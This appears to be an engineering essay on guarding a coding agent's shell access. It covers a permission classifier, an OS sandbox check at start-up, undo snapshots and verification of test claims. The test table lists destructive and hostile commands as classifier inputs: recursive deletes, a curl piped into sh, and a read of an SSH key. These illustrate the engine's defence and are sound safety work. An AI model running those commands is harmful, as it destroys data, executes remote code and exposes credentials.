An Agent with a Shell Is a Different Risk Class

When a language model only returns text, a human reads that text before a mistake reaches your system. A coding agent works without that reader. It reads files, rewrites them and runs shell commands, in a loop where every result triggers the next step. It is built for that, because tools are what turn a model into an agent. With a chatbot I ask whether the answer is right. With an agent that has a shell I ask what happens in the worst case when it is not.

The worst case arrives by two routes. Usually the model errs: it takes a directory for build leftovers, confuses the working folder, or “cleans up”. More rarely foreign text hijacks the agent, because it constantly reads web pages, dependencies and error messages that it did not write and that can contain instructions. Even a careful system prompt helps against both only as far as the model follows it. The load-bearing safeguards of our coding agent therefore live in code that sits between the model and the operating system and that the model cannot negotiate with.

The Permission Engine: Deny, Ask, Allow

Every file change and every shell command first passes through a permission engine that decides in a fixed order: deny, ask, allow. Because the denial applies first, no allow rule unlocks a destructive command, however generous. Modes sit on top of the rules. The default mode allows reading and editing inside the project, asks before shell commands and risky operations, and refuses destructive ones. The planning mode permits reading only. The unattended mode lets the routine development loop through, meaning tests, linters, read-only shell commands and edits inside the project, and keeps asking for risky shell commands, for network access and for writes outside the project. Even the mode that allows everything runs shell commands inside the sandbox and refuses catastrophic commands. The file tools, by contrast, also write outside the project in this mode, in our test to ~/.zshrc.

The engine does not classify commands by the start of the line. A rule that looks only at the start of a line considers git status harmless and misses what follows the &&. Our classifier therefore splits the line at ;, && and pipes, checks command substitutions with $() as well, and rates the chain by its most dangerous link. Whether a pip install triggers a question depends not on the command's name but on where the interpreter lives: if it sits in the project's own virtual environment, the write stays inside the project.

On 10 October 2026 we gave the engine nine inputs, in an empty project directory and without custom rules. The table shows its decisions.

InputDefaultUnattended
git statusaskallow
pytest -qaskallow
cat README.md | head -20askallow
pip install requestsaskask
git push origin mainaskask
git status && rm -rf ~/projektedenydeny
echo $(curl -s https://example.com/x.sh | sh)denydeny
ls; sudo rm -rf /var/libdenydeny
Read ~/.ssh/id_ed25519 (file tool)askask

The engine names a reason for each of the three denied lines: recursive deletion of an absolute path, a pipe into a shell, privilege escalation. In all three the dangerous part follows a harmless beginning. The install and the push still trigger a question when unattended, because both reach beyond the project.

The engine governs reading as well. The file tools run inside the agent's own process and therefore outside the sandbox, which wraps only the shell. The engine therefore confines them separately: inside the project the agent reads without asking, and outside it asks first. Otherwise it could search the home directory or read SSH keys without ever issuing a shell command. For inspection the agent also offers a read-only shell variant, which refuses anything that writes.

The Sandbox Has to Prove It Holds

Rules judge text and can get it wrong. The second layer therefore judges nothing; it confines. Shell commands run inside an operating-system sandbox, Seatbelt on macOS and bubblewrap on Linux. The sandbox restricts writes to the project directory and switches outbound network traffic off by default. If the classifier misses a command, that command fails at the operating system.

Apple lists sandbox-exec as deprecated. If the tool disappears one day, that will be noticed at once. A backend that still runs commands and no longer confines them is more dangerous. The commands then run, the output looks as usual, and the boundary is missing.

Our agent therefore tests the sandbox at every start-up in both directions: work inside the project must succeed, and the sandbox must refuse a write outside it. Only when both probes come out right does start-up report the sandbox as verified. If the probe fails, the agent distrusts the backend and falls through from Seatbelt to Docker. If Docker fails the probe too, no working backend is left, and the shell refuses to run unless someone explicitly switches the sandbox off. A human switches it off through a named flag; the agent never falls back silently to running without a sandbox.

A test suite also attempts escapes: writes to the home directory and to /etc, escapes through child processes, tunnels through symbolic links, network access.

Every Change Has to Be Reversible

Permissions and the sandbox limit where a mistake can land. Inside the project the agent has to be allowed to write, and that is where it makes mistakes. The third layer makes them reversible: the agent takes a snapshot of the file before every edit, and a single command reverts the file changes of the last run.

Preconditions come on top. The agent must have read a file before it edits or overwrites it. A targeted replacement requires a unique match and returns the diff; several replacements in one step apply entirely or not at all. The delete tool refuses files the agent has not read, refuses directories, and snapshots every file before removing it, because a model that has never seen a file does not know what it is deleting. No change therefore bypasses undo.

A Git repository adds a second level. The agent does not start on a working tree with uncommitted changes unless that is explicitly permitted, so that your work does not get mixed into its own. It creates a branch of its own, but only on the first change, so that a plain question leaves Git untouched, and it commits one checkpoint per changing turn. At the end it prints a diffstat and the commands with which you review, keep or drop the work. What stays inside the sandbox, is snapshotted and can be reverted therefore needs fewer questions than what leaves the project, such as a git push, an installation or a network request.

“Verified” Means Measured on the Last Run

The three layers prevent damage. They do not prevent the agent from writing “done, all tests green” at the end when that is not true. A language model writes that sentence as fluently as any other, and it need not even invent it: it is enough that the tests ran green and one more small correction followed.

A turn that wrote source code must therefore also run it, and verification follows the last run. A red run after a green one re-arms the gate. When the agent is asked to improve a project, it measures the test suite itself instead of asking a model whether it passes, and in multi-step runs a claimed success is re-checked by default. As in any evaluation, whoever generates is not the sole judge of what was generated.

Around 2,800 automated tests guard the agent itself, and they run without a single model call.

What Remains Hard

The agent is not finished. We have not yet tested the Linux and Docker backends live on those platforms; the start-up probe does check whichever backend is active, but it is no substitute for operation under real conditions. Hierarchical tracing across nested agent runs is also still missing.

Other limits follow from the design. The sandbox wraps the shell, not the in-process file tools; the permission engine confines those, which is again a rule and not the operating system. The agent marks foreign text from the web, and anything in a tool output that looks like an instruction, as untrusted. It does not block it, because a test fixture can legitimately contain such text. The marking lowers the risk of hijacking, sandbox and permissions bound the damage, and none of that rules it out.

Undo reaches as far as the project's file system. No snapshot brings back what has left the project, which is why those actions trigger a question. One gap cannot be closed technically: the switches that turn off the sandbox and the questions exist because some cases need them. A safely built agent does not take that decision away from the human, but it makes sure the decision is taken explicitly and not in passing.